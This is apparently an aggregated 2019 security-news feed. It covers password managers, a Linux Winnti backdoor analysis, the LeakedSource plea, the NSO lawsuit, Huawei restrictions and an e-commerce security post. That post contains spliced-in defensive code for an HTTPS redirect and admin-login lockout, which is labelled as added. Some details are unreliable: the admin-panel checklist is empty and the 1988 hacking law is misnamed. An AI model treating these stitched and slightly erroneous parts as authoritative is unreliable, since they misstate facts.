We at HackerCombat have always emphasised the importance of passwords and password management in cybersecurity. At a time when even individual users have to manage many login IDs and passwords, it’s undoubtedly a herculean task for organisations to manage the large number of passwords they have at their disposal. (Remember, from a security point of view it’s never advisable to reuse the same password across different accounts or services!) The best thing that organisations can do about handling passwords is to use a decent password manager.

Here is our list of the six best password managers that can be used for online protection in 2019:

Keeper, from Keeper Security Inc.

The password manager offered by Keeper Security Inc., which runs on Windows, Linux and Mac, is ideal for business enterprises and other organisations and can also be used by individuals or family groups. Keeper uses two-factor authentication plus secure file storage, which ensures comprehensive protection of your information. Other notable features include version history (the ability to restore previous versions of users’ records), emergency access for up to five contacts to a subscriber’s passwords, and custom fields for keeping personal records (driving licence numbers, passport data etc) in the app. It also offers a great deal of flexibility over where data is stored.

LastPass Password Manager

The LastPass password manager, available for Windows, Linux, Mac and Chrome, offers some remarkable features, including two-factor authentication, free credit monitoring, an auto-fill feature to streamline users’ shopping and multiple identities. Once the user sets up a master password, LastPass can import all saved login credentials from Chrome, Firefox, Edge, Opera and Safari. After that, the user only needs to remember the master password and the rest is taken care of. A notable advantage of LastPass is that it stores encrypted information on its cloud servers, so users can access their passwords from computers other than their own PCs. They can also share data with others in their family group or organisation, who can then access the credentials from the cloud. There’s also a password generator that helps create unique passwords. The premium version adds further authentication options, syncing with mobile devices and priority tech support. LastPass is worth using for its excellent interface and notable features.

Sticky Password, from the AVG Antivirus team

Sticky Password is a password manager for Windows, macOS, iOS and Android, created by the team behind the AVG antivirus. It supports a large number of browsers, especially on the desktop, offers encrypted cloud syncing between devices and, in addition to the conventional sign-in options, supports Face ID and fingerprint sign-in. It’s simple to use and comes in a free version plus a premium version with extra cloud features. It uses AES-256 encryption and has strong password-generation capabilities.

1Password, from AgileBits Inc.

1Password, a good password manager for Windows, macOS, Android, iOS and Chrome OS, has notable features like reliable username and password storage with secure sharing, a strong password generator, a digital wallet (for saving logins, card data, network passwords etc) and an intuitive, easy user interface. Developed by AgileBits Inc., its highlight is the built-in “Watchtower” service, which notifies users of breaches at websites they hold accounts with. In addition to local syncing, the password manager can sync information between computers via iCloud, Dropbox etc. There is no free version of 1Password. It is also available as browser extensions for desktop browsers including Chrome, Safari, Firefox, Edge and Opera.

LogMeOnce Password Manager

One of the best password managers for Mac OS X, LogMeOnce also syncs passwords across Windows, iOS and Android. Notable features include two-factor authentication, AES-256 encryption of stored passwords and the remarkable Mugshot feature, which photographs whoever is attempting to access the account and tracks the device’s location in case it is stolen.

Dashlane Password Manager

Dashlane, which runs on Windows, Mac, iOS and Android, has some notable features. It is secured with two-factor authentication and lets users change passwords for multiple websites with just a few clicks. Passwords are encrypted with AES-256 and can be stored locally or automatically synced across devices. Dashlane’s automatic password changer rotates account passwords without the user having to visit each site. There is a free version for individual users, but businesses need the paid version, which comes with an annual fee.

Related Resources:

10 Practical Computer Protection Tips

7 Data Protection Tips for Small Businesses

The post Six Best Password Managers for Online Protection in 2019 appeared first on .

Sajid Javid announces overhaul of espionage and treason laws

New bill needed to tackle hostile activity by Russia and others, says home secretary

Hostile state actors – spies, assassins or hackers directed by the government of another country – are to be targeted by refreshed espionage and treason laws, the home secretary has announced.

In a speech to security officials in central London, Sajid Javid revealed plans to publish a new espionage bill to tackle increased hostile state activity from countries including but not limited to Russia.


Chronicle experts spotted a Linux variant of the Winnti backdoor

Security researchers from Chronicle, Alphabet’s cyber-security division, have spotted a Linux variant of the Winnti backdoor.

It is the first time that researchers have found a Linux version of the backdoor used by the China-linked APT groups tracked as Winnti.


The experts believe that several APT groups operate under the Winnti umbrella, including Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEAD, PassCV, Wicked Panda and ShadowPad. The groups show similar tactics, techniques and procedures (TTPs) and in some cases share portions of the same hacking infrastructure.

Chronicle researchers came across the Linux variant while investigating the cyber attack that hit the Bayer pharmaceutical company in April.

Searching for samples of Winnti malware on its VirusTotal platform, the experts discovered a Linux variant of Winnti, dating back to 2015. At the time the malware was used in the hack of a Vietnamese gaming company.

“In April 2019, reports emerged of an intrusion involving Winnti malware at a German Pharmaceutical company,” reads the analysis published by Chronicle. “Analysis of these larger convoluted clusters is ongoing. While reviewing a 2015 report of a Winnti intrusion at a Vietnamese gaming company, we identified a small cluster of Winnti samples designed specifically for Linux.”

The technical analysis of the Linux version of the Winnti backdoor revealed two components: the main backdoor (libxselinux) and a companion library used to hide its activity and evade detection.

The Winnti backdoor has a modular structure, it implements distinct functionalities using plugins. During the analysis, the researchers were unable to recover any active plugins. Experts believe attackers used additional modules for Linux to implement plugins for remote command execution, file exfiltration, and socks5 proxying on the infected host.

Further analysis revealed many code similarities between the Linux version of the Winnti variant and the Winnti 2.0 Windows version.

“The decoded configuration is similar in structure to the version Kaspersky classifies as Winnti 2.0, as well as samples in the 2015 Novetta report,” continues the report. “Embedded in this sample’s configuration are three command-and-control server addresses and two additional strings we believe to be campaign designators. In Winnti ver. 1, these values were designated as ‘tag’ and ‘group’.”

Like Windows variants of the Winnti backdoor, the Linux version also handles outbound communications using multiple protocols including ICMP, HTTP, as well as custom TCP and UDP protocols.

The Linux version also implements another feature that allows threat actors to initiate connections to infected hosts without requiring a connection to a control server.

The feature could allow attackers to directly access infected systems when access to the hard-coded control servers is disrupted.

“This secondary communication channel may be used by operators when access to the hard-coded control servers is disrupted. Additionally, the operators could leverage this feature when infecting internet-facing devices in a targeted organization to allow them to reenter a network if evicted from internal hosts.” continues the report. “This passive implant approach to network persistence has been previously observed with threat actors like Project Sauron and the Lamberts.”

In 2016, the Winnti hackers also hit German heavy industry giant ThyssenKrupp to steal company secrets.

Technical information about this passive listening feature was also shared by the ThyssenKrupp CERT, whose experts released an Nmap script that can identify Winnti infections through network scanning.

“An expansion into Linux tooling indicates iteration outside of their traditional comfort zone. This may indicate the OS requirements of their intended targets but it may also be an attempt to take advantage of a security telemetry blindspot in many enterprises, as is with Penquin Turla and APT28’s Linux XAgent variant,” concludes the report, which includes IoCs and Yara rules for identifying the threat.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Winnti, Linux malware)

The post Chronicle experts spotted a Linux variant of the Winnti backdoor appeared first on Security Affairs.

Company Behind LeakedSource Pleads Guilty after RCMP Investigation

A company responsible for helping to operate LeakedSource has submitted a guilty plea following an investigation by the Royal Canadian Mounted Police (RCMP). On 17 May, Defiant Tech Inc. pleaded guilty to the charge of “trafficking in identity information and possession of property obtained by crime” in association with an investigation surrounding LeakedSource. RCMP initiated […]

The post Company Behind LeakedSource Pleads Guilty after RCMP Investigation appeared first on The State of Security.

LeakedSource Company Pleads Guilty

The operators of an infamous breached credentials site have pleaded guilty to trading in stolen information, according to Canadian police.

Defiant Tech, which owns the LeakedSource website, entered the plea on Friday at a court in Ottawa, a brief notice from the Royal Canadian Mounted Police (RCMP) stated.

The charges of “trafficking in identity information and possession of property obtained by crime” came after an investigation was launched by the police in 2016, when the RCMP found that servers hosting LeakedSource were located in Quebec.

Project “Adoration,” as it was known, saw the RCMP’s newly formed National Division Cybercrime Investigative Team receive assistance from the Dutch National Police and the FBI.

In December 2017, Jordan Evan Bloom, 27, from Thornhill, Ontario, was arrested on suspicion of making an estimated C$247,000 ($200,000) from the business.

The now-defunct site had a database of around three billion passwords and identity records, which users could access via simple search functionality for a fee. This information is said to have been purchased from hackers and lifted from the public domain. Data was taken from big-name companies like LinkedIn and MySpace.

"We are pleased with this latest development,” said superintendent Mike Maclean, officer in charge of criminal operations for RCMP National Division.

“This is all thanks to the relentless efforts put by our men and women working in the National Division Cybercrime Investigative Team. I am immensely proud of this outcome as combating cybercrime is an operational priority for us."

A second man is suspected to have conspired with Bloom, but charges have so far not been brought.

Ex-CIA Man Gets 20 Years for Handing China Secrets

A former CIA intelligence officer has been sentenced to two decades behind bars after being found guilty last year of passing defense secrets to China.

Kevin Patrick Mallory, 62, of Leesburg, was found guilty by a federal jury in June 2018 of conspiracy to deliver, attempted delivery, delivery of national defense information to aid a foreign government, and making material false statements.

He is said to have been paid $25,000 for handing classified documents to 'Michael Yang,' a Chinese intelligence officer he met in Shanghai in March and April 2017.

These documents included information on CIA informants, according to the Department of Justice.

Fluent Mandarin-speaker Mallory is said to have scanned the Top Secret documents onto an SD card at his local FedEx store. Yet although he shredded the originals, the FBI found the storage device carefully hidden, during a search of his home.

The disgraced former spy worked for various government agencies and defense contractors, including roles as a covert case officer for the CIA and an intelligence officer for the Defense Intelligence Agency (DIA). His Top Secret clearance is said to have been terminated in 2012 when he left government service.

“Former US intelligence officer Kevin Patrick Mallory will spend the next 20 years of his life in prison for conspiring to pass national defense information to a Chinese intelligence officer,” said assistant attorney general for national security, John Demers.

“This case is one in an alarming trend of former US intelligence officers being targeted by China and betraying their country and colleagues. This sentence, together with the recent guilty pleas of Ron Hansen in Utah and Jerry Lee in Virginia, deliver the stern message that our former intelligence officers have no business partnering with the Chinese, or any other adversarial foreign intelligence service.”

Lee is thought to have provided the information needed to take down a major CIA network in China between 2010 and 2012. The US is believed to be at a distinct intelligence disadvantage now with regards to China.

Google will block Huawei from using Android and its services

The Reuters agency revealed in exclusive that Alphabet Inc’s Google has suspended some business with Huawei after Trump’s ban on the telco giant.

The news is a bombshell: Google has suspended some business with Huawei after Trump’s ban on the Chinese telco giant.

In November, The Wall Street Journal reported that the US Government is urging its allies to exclude Huawei from critical infrastructure and 5G architectures.

The United States is highlighting the risks for national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.


The decision is a blow to Huawei and has a significant impact on its strategy.

Just on Thursday, President Trump added Huawei Technologies to a trade blacklist, but on Friday the U.S. Commerce Department said it was considering scaling back the restrictions on the company to “prevent the interruption of existing network operations and equipment”.

“Alphabet Inc’s Google has suspended business with Huawei that requires the transfer of hardware, software and technical services except those publicly available via open source licensing,” Reuters reported.

Google explained that there will be no impact on current owners of Huawei devices running Google software because they will continue to receive updates provided by the US firm.

“We are complying with the order and reviewing the implications,” said a Google spokesperson.

“For users of our services, Google Play and the security protections from Google Play Protect will continue to function on existing Huawei devices,”

The decision will of course disrupt the Chinese firm’s commercial activity outside China. Anyone who buys a new Huawei device will have no access to Google’s Android updates and no access to Google services, including the Google Play Store and the Gmail and YouTube apps.

Google confirmed that Huawei will only be able to use the public version of Android (Android Open Source Project (AOSP)), but the users of the Chinese giant will not be able to get access to proprietary apps and services from Google.

The Google decision could make it impossible for the Chinese company to sell its devices abroad and other companies could interrupt any trade with the company fearing repercussions.

Intel Corp, Qualcomm Inc, Xilinx Inc, and Broadcom Inc have already announced that they will not supply critical software and components to Huawei until further notice.

Is the Chinese giant ready to face this earthquake?

According to the company, it is already working to develop its own technology fearing a total block from US companies.

“Huawei has said it has spent the last few years preparing a contingency plan by developing its own technology in case it is blocked from using Android. Some of this technology is already being used in products sold in China, the company has said,” Reuters reported.

“No matter what happens, the Android Community does not have any legal right to block any company from accessing its open-source license,” Eric Xu, rotating chairman of Huawei, told Reuters in March.

Pierluigi Paganini

(SecurityAffairs – Android, Google)

The post Google will block Huawei from using Android and its services appeared first on Security Affairs.

Chipmakers Cut Huawei Shipments

European and US chipmakers have stopped supplying Huawei with products while Google will cease providing technical Android support from the next OS iteration, as Donald Trump’s executive order starts to bite.

Google said in a tweet yesterday: “while we are complying with all US gov't requirements, services like Google Play & security from Google Play Protect will keep functioning on your existing Huawei device.”

However, it’s believed the same will not be true of new Huawei handsets. Google is also set to cut key support for the operating system from its next version, which could leave users without apps like YouTube and Google Maps, according to reports.

Huawei could still use the open source version of Android, although it has been developing an in-house OS which it could also switch across to in the event that Trump’s executive order is not reversed.

The firm is also being hit as global chipmakers cut supplies in compliance with the order. Qualcomm (smartphones), Intel (servers and laptops), Xilinx and Broadcom (networking kit) and many other US producers, as well as German chipmaker Infineon, have reportedly taken immediate action.

Huawei produces some processors and modems for its smartphones in-house, so Qualcomm’s decision is perhaps the least likely to affect it. The firm is said to have stockpiled other types of chips for several months while it waits to see whether the US action is a bargaining play or is set for the long-term.

Trump signed an executive order last week banning “foreign adversaries” from providing telecoms equipment in the US. However, Huawei and 70 subsidiaries were also placed on an “Entity List” meaning US firms are not able to supply it with their products unless Huawei is granted a special license from the Commerce Department.

Although the tech firms have already taken action, the department is still drawing up the enforcement plan, and has 150 days to do so.

3 Ways to Improve Your Online Store’s Cyber Security

If you don’t do your utmost best to ensure that your online store is safe to use, you could end up putting your customers in real danger. From their finances being stolen to their personal data being hacked into, any kind of trouble could befall your site’s users if you do not take cyber security seriously. Make sure, then, that you take it seriously!

When it comes to improving your online store’s cybersecurity measures, the following advice makes for essential reading.

Make your mobile payments safer

One of the most burgeoning e-commerce trends is mobile payment. As stated on Oberlo’s mobile shopping trends article, this is because this kind of transaction process prioritizes comfort, and it makes the buying process a whole lot simpler. You would be foolish not to grant your customers the opportunity to pay for things on your store via their mobile devices.

Allowing this kind of payment does come with drawbacks, however, the biggest being that it isn’t always the safest form of transaction. That doesn’t mean you can’t strengthen your mobile payment process. Measures you can and should put in place include:

  • Only ever using a trusted payment platform, rather than collecting and storing card data yourself
  • If you also take payments in person, ensuring that your payment terminals are NFC-enabled
  • Encrypting traffic on your network (TLS end to end) so that sensitive information cannot be read in transit

Switch to HTTPS

In this day and age, if you continue to stick with plain HTTP, your online store will be a sitting duck for cyber criminality: everything your customers send, including credentials and card details, crosses the network in the clear. If you’re serious about safety, you must switch to HTTPS.

Created initially to safeguard the particularly sensitive parts of e-commerce sites, such as the checkout, HTTPS is now used to protect whole websites. Serving every page over TLS protects your visitors’ data in transit; it does not protect data at rest on your servers or fix flaws in the site itself, so treat it as a baseline rather than a finish line.
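One concrete way to make the switch stick, as an added example (this is not the CyberDB post’s own code and assumes a Python WSGI store application; `store_app`, the `shop.example` host and the `/cart?item=42` request are constructed stand-ins): a middleware that sends every plaintext request to its https equivalent with a 301 and stamps `Strict-Transport-Security` on every TLS response, so returning browsers never try HTTP again. The `X-Forwarded-Proto` header is only honoured when the deployment explicitly trusts a TLS-terminating proxy, because any client can send that header and use it to skip the redirect.

```python
"""HTTP-to-HTTPS redirect plus HSTS as a WSGI middleware (standard library only).
Added example; the wrapped store application is a stand-in, not a real shop."""
from urllib.parse import quote

# One year, covering subdomains. Only send this once every host under the
# domain serves TLS, because browsers will refuse plain HTTP for all of them.
HSTS_VALUE = "max-age=31536000; includeSubDomains"


def request_is_https(environ, trust_proxy_header=False):
    """True if the request arrived over TLS.

    wsgi.url_scheme is set by the server itself. X-Forwarded-Proto is set by a
    TLS-terminating proxy, but any client can send it too, so it is honoured
    only when the deployment says the proxy in front of the app is trusted.
    """
    if environ.get("wsgi.url_scheme") == "https":
        return True
    if trust_proxy_header:
        proto = environ.get("HTTP_X_FORWARDED_PROTO", "").split(",")[0].strip().lower()
        return proto == "https"
    return False


def https_url(environ):
    """Rebuild the requested URL with an https scheme, keeping path and query."""
    host = environ.get("HTTP_HOST") or environ["SERVER_NAME"]
    url = "https://" + host + quote(environ.get("PATH_INFO") or "/")
    if environ.get("QUERY_STRING"):
        url += "?" + environ["QUERY_STRING"]
    return url


class ForceHTTPS:
    """Redirect plaintext requests; add Strict-Transport-Security to TLS responses."""

    def __init__(self, app, trust_proxy_header=False):
        self.app = app
        self.trust_proxy_header = trust_proxy_header

    def __call__(self, environ, start_response):
        if not request_is_https(environ, self.trust_proxy_header):
            # 301 keeps browsers and search engines on the https URL from now on.
            start_response("301 Moved Permanently",
                           [("Location", https_url(environ)), ("Content-Length", "0")])
            return [b""]

        def start_response_with_hsts(status, headers, exc_info=None):
            headers = [(k, v) for k, v in headers if k.lower() != "strict-transport-security"]
            headers.append(("Strict-Transport-Security", HSTS_VALUE))
            return start_response(status, headers, exc_info)

        return self.app(environ, start_response_with_hsts)


def store_app(environ, start_response):
    """Stand-in for the real shop application."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"cart contents"]


def handle(environ, trust_proxy_header=False):
    """Run one request through the middleware; returns (status, headers dict, body)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = dict(headers)

    body = b"".join(ForceHTTPS(store_app, trust_proxy_header)(environ, start_response))
    return captured["status"], captured["headers"], body


def sample_environ(scheme, **extra):
    """Constructed WSGI environ for GET /cart?item=42 on shop.example."""
    env = {"wsgi.url_scheme": scheme, "HTTP_HOST": "shop.example",
           "SERVER_NAME": "shop.example", "PATH_INFO": "/cart",
           "QUERY_STRING": "item=42", "REQUEST_METHOD": "GET"}
    env.update(extra)
    return env


if __name__ == "__main__":
    print(handle(sample_environ("http")))   # 301 to https://shop.example/cart?item=42
    print(handle(sample_environ("https")))  # 200 with the HSTS header added
```

Deploy the redirect at the edge (load balancer or web server) where you can, and keep the HSTS max-age short while you confirm every subdomain really does serve TLS; a long max-age with `includeSubDomains` is hard to take back once browsers have cached it.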

Protect your Admin Panel

Your admin panel is the part of your store that is easiest for cybercriminals to crack. All it takes is a weak or reused password, and hackers can have a field day with all of the data you store in the backend of your site.

To protect your Admin Panel, you need to:

If they were to encounter trouble with a cybercriminal while using your online store, you can be sure that your customers will not give you a second chance. They will lose trust in you instantly, and more than likely never return to you again — and they’ll tell everybody that they know to avoid your website in the future, too, for good measure. If you don’t take cybersecurity seriously, you could also even find yourself in hot water with the authorities. The impact cyber criminality could have on your online store is something you should want to avoid at all costs, which is why you must put all of the above advice into practice as soon as possible.
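As an added example of the admin-panel login hardening the section argues for (not the CyberDB post’s own code; the `AdminAuth` class, the password policy thresholds, the deny list of common passwords and the `admin` account below are all constructed for illustration): store only salted PBKDF2 hashes, compare them in constant time, refuse passwords that fail a minimum policy, and lock the account after repeated failures so a brute-force run against the panel stalls instead of succeeding.

```python
"""Admin-panel login hardening: salted PBKDF2 password hashes, constant-time
comparison, a minimum password policy and per-account lockout after repeated
failures. Added example; thresholds and the deny list are constructed."""
import hashlib
import hmac
import os
import time

PBKDF2_ROUNDS = 600_000          # slows offline cracking if the hash store leaks
MIN_LENGTH = 12
COMMON_PASSWORDS = {"password", "admin", "letmein", "123456", "qwerty"}  # constructed deny list
MAX_FAILURES = 5
LOCKOUT_SECONDS = 900
DUMMY_SALT, DUMMY_DIGEST = b"\x00" * 16, b"\x00" * 32   # used for unknown users, see login()


def password_meets_policy(password):
    """Reject short passwords and anything on the common-password deny list."""
    return len(password) >= MIN_LENGTH and password.lower() not in COMMON_PASSWORDS


def hash_password(password, salt=None, rounds=PBKDF2_ROUNDS):
    """Return (salt, digest); a fresh 16-byte random salt per password."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return salt, digest


class AdminAuth:
    """In-memory admin credential store with lockout; clock is injectable for tests."""

    def __init__(self, clock=time.monotonic, rounds=PBKDF2_ROUNDS):
        self._clock = clock
        self._rounds = rounds
        self._users = {}          # username -> (salt, digest)
        self._failures = {}       # username -> consecutive failed attempts
        self._locked_until = {}   # username -> monotonic timestamp

    def register(self, username, password):
        if not password_meets_policy(password):
            raise ValueError("password does not meet policy")
        self._users[username] = hash_password(password, rounds=self._rounds)

    def is_locked(self, username):
        return self._clock() < self._locked_until.get(username, 0.0)

    def login(self, username, password):
        """True only if the account is not locked and the password matches."""
        if self.is_locked(username):
            return False          # do not even evaluate the password while locked
        # Hash against dummy values for unknown users so response time does not
        # reveal whether the username exists.
        salt, digest = self._users.get(username, (DUMMY_SALT, DUMMY_DIGEST))
        _, candidate = hash_password(password, salt, self._rounds)
        if username in self._users and hmac.compare_digest(candidate, digest):
            self._failures.pop(username, None)
            return True
        failures = self._failures.get(username, 0) + 1
        self._failures[username] = failures
        if failures >= MAX_FAILURES:
            self._locked_until[username] = self._clock() + LOCKOUT_SECONDS
            self._failures.pop(username, None)
        return False


if __name__ == "__main__":
    auth = AdminAuth()
    auth.register("admin", "Correct-Horse-Battery-9")
    print(auth.login("admin", "Correct-Horse-Battery-9"))   # True
    for _ in range(MAX_FAILURES):
        auth.login("admin", "wrong-guess-0000")
    print(auth.is_locked("admin"))                           # True
```

Pair this with a second factor and with restricting the panel to a VPN or allow-listed IP range; the lockout stops a single attacker from guessing passwords, but it is not a substitute for keeping the panel off the open internet.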

The post 3 Ways to Improve Your Online Store’s Cyber Security appeared first on CyberDB.

Amnesty International filed a lawsuit against Israeli surveillance firm NSO

Amnesty International filed a lawsuit against Israeli surveillance firm NSO and fears its staff may be targeted by the company with its Pegasus spyware.

The name NSO Group made the headlines last week after the disclosure of the WhatsApp flaw exploited by the company to remotely install its surveillance software.

The Israeli firm is now facing a lawsuit backed by Amnesty International, and the non-governmental organization fears its staff may be under surveillance by spyware delivered through the WhatsApp issue.

The lawsuit was filed in Israel by about 50 members and supporters of the human rights group. The organization calls on the Israeli ministry of defence to ban the export of the Pegasus surveillance software developed by NSO Group.

“An affidavit from Amnesty is at the heart of the case, and concludes that “staff of Amnesty International have an ongoing and well-founded fear they may continue to be targeted and ultimately surveilled” after a hacking attempt last year.” reads the post published by The Guardian.

“The Israeli government’s Defence Export Controls Agency has failed to exercise proper oversight “despite serious allegations of abuse”, the affidavit claimed, adding: “Because of DECA’s inaction, NSO Group can continue to sell its software to governments known to target human rights defenders.””

Officially, the sale of the surveillance software is limited to authorized governments, to support agencies’ investigations of criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

In July, Citizen Lab collected evidence of attacks against 175 targets worldwide carried out with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar and Saudi Arabia, where the Israeli surveillance software is becoming very popular.

In August, an Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.

According to Joshua Franco, Amnesty’s head of technology and human rights, the trade in surveillance software is getting out of control.

In August, the human rights group published a report providing details of the attack against an employee of Amnesty International. The hackers attempted to compromise the mobile device of a staff member in early June by sending him a WhatsApp message about a protest in front of the Saudi Embassy in Washington.


The organization added that such attacks are becoming even more frequent, with a growing number of Israeli surveillance tools being used to spy on human rights workers and opposition figures in the Middle East and beyond.

Amnesty International traced the malicious link in the message to the surveillance network of the Israeli firm NSO Group.

The Guardian reported that NSO Group already faced many other lawsuits, such as the one backed by Omar Abdulaziz, a Saudi dissident based in Montreal. In December Abdulaziz filed a lawsuit in Israel in which he claimed that his phone was infected with the NSO spyware when he was in regular contact with the journalist Jamal Khashoggi.

In November, Snowden warned of abuse of surveillance software that also had a role in the murder of the Saudi Arabian journalist Jamal Khashoggi.

Khashoggi is believed to have been killed by Saudi Arabia’s agents, and the country licensed NSO software in 2017, paying $55m for the technology.

NSO said it wants to demonstrate that it is not involved in any abuse of its technology, and it prepared a 26-page report to reply to the accusations made by Amnesty and Citizen Lab.

It is notable that in early 2019 a majority stake in NSO was acquired by the London-based firm Novalpina Capital, founded by the banker and philanthropist Stephen Peel.

The Guardian reported an excerpt of the reply to Amnesty, signed by Peel, that states that in “almost all” the cases of complaints of human rights abuse raised, the alleged victim of hacking had not been a target or the government in question had acted with “due lawful authority”.

“We believe that the reality is different. We’ve seen them target human rights organisations and no evidence they’ve been able to effectively control governments when complaints have been raised.” replied Danna Ingleton, the deputy director of Amnesty’s technology division.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – NSO Group, Amnesty International)

The post Amnesty International filed a lawsuit against Israeli surveillance firm NSO appeared first on Security Affairs.

On the path to Zero Trust security: Time to get started

No need to belabour the point. We all know that trying to defend the network perimeter is a bit futile in today’s mobile and cloud first world. So, the obvious question – what’s next? Vendors are quick to come to your aid with their latest, next generation, virtualized, machine learning and AI based security platform. Industry analysts on the other hand are proposing various security frameworks and approaches for reducing risk. Whether it’s Gartner with … More

The post On the path to Zero Trust security: Time to get started appeared first on Help Net Security.

Microsoft’s Attack Surface Analyzer now works on Macs and Linux, too

Microsoft has rewritten and open-sourced Attack Surface Analyzer (ASA), a security tool that points out potentially risky system changes introduced by the installation of new software or configuration changes. About Attack Surface Analyzer The initial version of the tool (v1.0, aka “classic”) was released in 2012 and worked only on Windows. It can still be downloaded, but is no longer supported. This newest version (v.2.0) is built using .NET Core 2.1 and Electron, and … More

The post Microsoft’s Attack Surface Analyzer now works on Macs and Linux, too appeared first on Help Net Security.

Ransomware and malware attacks decline, attackers adopting covert tactics

There has been a major decline in ransomware and malware attacks, with Ireland having some of the lowest rates globally, according to the latest report released by Microsoft. This is a significant change from 2017, following a prolific series of attacks that targeted supply chains globally. Initial predictions were that these would increase; however, improvements in cybersecurity measures and detection have impacted the success rates of these attacks. In fact, there has been a … More

The post Ransomware and malware attacks decline, attackers adopting covert tactics appeared first on Help Net Security.

Over half of all reported vulnerabilities in Q1 2019 have a remote attack vector

There were 5,501 vulnerabilities aggregated by Risk Based Security’s VulnDB that were disclosed during the first three months of 2019. This represents a 1% increase over the same period in 2018, making this Q1 an all-time high. The results were released in the Q1 2019 Vulnerability QuickView Report. CVSSv2 scores of 9.0+, deemed critical issues, accounted for 14.0% of all published Q1 2019 vulnerabilities. Risk Based Security’s VulnDB published 2,539 (85%) more vulnerabilities than CVE/NVD … More

The post Over half of all reported vulnerabilities in Q1 2019 have a remote attack vector appeared first on Help Net Security.

Keeping Passwords Simple

We know at times this whole password thing sounds really complicated. Wouldn't it be great if there was a brain-dead simple way you could keep passwords simple and secure at the same time? Well, it's not nearly as hard as you think. Here are three tips for keeping passwords super simple while keeping your accounts super secure.

Phishing targeting SaaS and webmail services increased to 36% of all phishing attacks

Users of Software-as-a-Service (SaaS) and webmail services are being targeted with increasing frequency, according to the APWG Q1 2019 Phishing Activity Trends Report. The category became the biggest target in Q1, accounting for 36 percent of all phishing attacks, for the first time eclipsing the payment-services category which suffered 27 percent of attacks recorded in the quarter. Online SaaS applications have become fundamental business tools, since they are convenient to use and cost-effective. SaaS services … More

The post Phishing targeting SaaS and webmail services increased to 36% of all phishing attacks appeared first on Help Net Security.

Do You Know When The First Cyber Attack Took Place? Read On

WannaCry, a malicious computer virus that encrypts data and demands a ransom, hit thousands of computers across the world, causing several organizations to close down. Not a day goes by without a large company admitting that its data has been breached. Cyber attacks are commonly thought of as a feature of modern life, but their history goes back farther than expected.

Do you know when the first cyber attack occurred? Many attribute it to Robert Morris, a 20-year-old Cornell undergraduate student, in 1988. He was also the first person to be charged under the Fraud and Cyber Abuse Act. Nevertheless, this was not the first cyber attack. The first one happened in 1834, on the optical telegraph system known as semaphore, long before the Internet and computers came into existence.

The semaphore system consisted of a chain of towers, each with a movable wooden arm at its top. Different configurations of these arms were used to denote different symbols, letters, and numbers. The operators of each tower would use a telescope to read the configuration of the adjacent tower and then reproduce it on their own tower, making it possible to deliver messages much faster than before. The semaphore network was reserved exclusively for government use; however, in 1834, two brothers, François and Joseph Blanc, came up with a means of hacking into the system for their personal benefit.

François and Joseph Blanc traded government bonds on the Bordeaux stock exchange, which kept a close watch on the Paris stock exchange. The Paris exchange was the primary market, and the secondary markets always lagged behind because of the time it took for information to travel by post. So if traders could obtain the information in advance, they could make a lot of money by anticipating the market’s moves.

The Blanc brothers bribed a telegraph operator in Tours, who had an accomplice in Paris to supply him with stock market information. The operator would then relay the news from Tours to Bordeaux over the semaphore system by inserting deliberate errors, in effect a code, into government messages; these were later deciphered by another operator, a man of the Blancs’ stationed near the Bordeaux end of the line.

This lasted for approximately two years, until one day the Tours operator became ill. He confided the scheme to one of his friends in the hope that the friend would continue the practice. Instead, the friend declined and reported the operator to the authorities. The Blanc brothers were arrested for their cyber attack but were released because no adequate law existed.

“The Blanc brothers’ story is also a reminder that with any new invention, people will always find a way to use it maliciously. This is a timeless aspect of human nature, and it’s not something technology can or should be designed to solve,” Tom Standage of The Economist writes. This is still so relevant.


The post Do You Know When The First Cyber Attack Took Place? Read On appeared first on .

Companies investing in advanced forensic capabilities to identify attackers in greater detail

One in five companies is already using forensic investigations and other sophisticated methods to identify their attackers, like setting up honey pots and repositories of fake data to give attackers the idea they’ve hit real data while acting as a diversion tactic, according to Neustar. Companies’ growing investment in advanced forensic capabilities that can help identify attackers in greater detail is increasingly eclipsing what most law-enforcement agencies are willing to devote. 72 percent of respondents … More

The post Companies investing in advanced forensic capabilities to identify attackers in greater detail appeared first on Help Net Security.

Things You Need to Know About Open Source – The FAQ Edition

Open Source projects can be a great asset, or they can be a curse. It is all in how you manage it. To be successful in using open source, there are several things to keep in mind, from licensing to updates. And if you ignore any of them, it can cause problems. Here are some […]… Read More

The post Things You Need to Know About Open Source – The FAQ Edition appeared first on The State of Security.

JASK launches a new Heads Up Display for security operations centers

JASK, the provider of the industry’s first cloud-native SIEM platform, unveiled a first-of-its-kind Heads Up Display (HUD) for security operations centers (SOCs) based on cutting-edge scientific design principles and visualization concepts never before used in the cybersecurity industry. Drawing inspiration from leading designers in science fiction and gaming as well as the latest user interface design concepts, the enhanced JASK ASOC platform offers maximal functionality on a single screen. This update enables security teams to … More

The post JASK launches a new Heads Up Display for security operations centers appeared first on Help Net Security.

QuintessenceLabs to extend support for RSA Data Protection Manager software customers

QuintessenceLabs has announced a partnership to allow customers of RSA Data Protection Manager software (DPM) to receive extended support beyond the RSA DPM End-Of-Life date of September 30, 2019. As part of this agreement, QuintessenceLabs will provide the same level of enterprise-class support, Service Level Objectives and product quality as RSA provided. RSA DPM customers can renew their DPM maintenance contract directly with QuintessenceLabs to benefit from long-term DPM support. QuintessenceLabs is also providing a … More

The post QuintessenceLabs to extend support for RSA Data Protection Manager software customers appeared first on Help Net Security.

Checkmarx deploys CxSAST on Project Hosts’ FPC FedRAMP-authorized PaaS

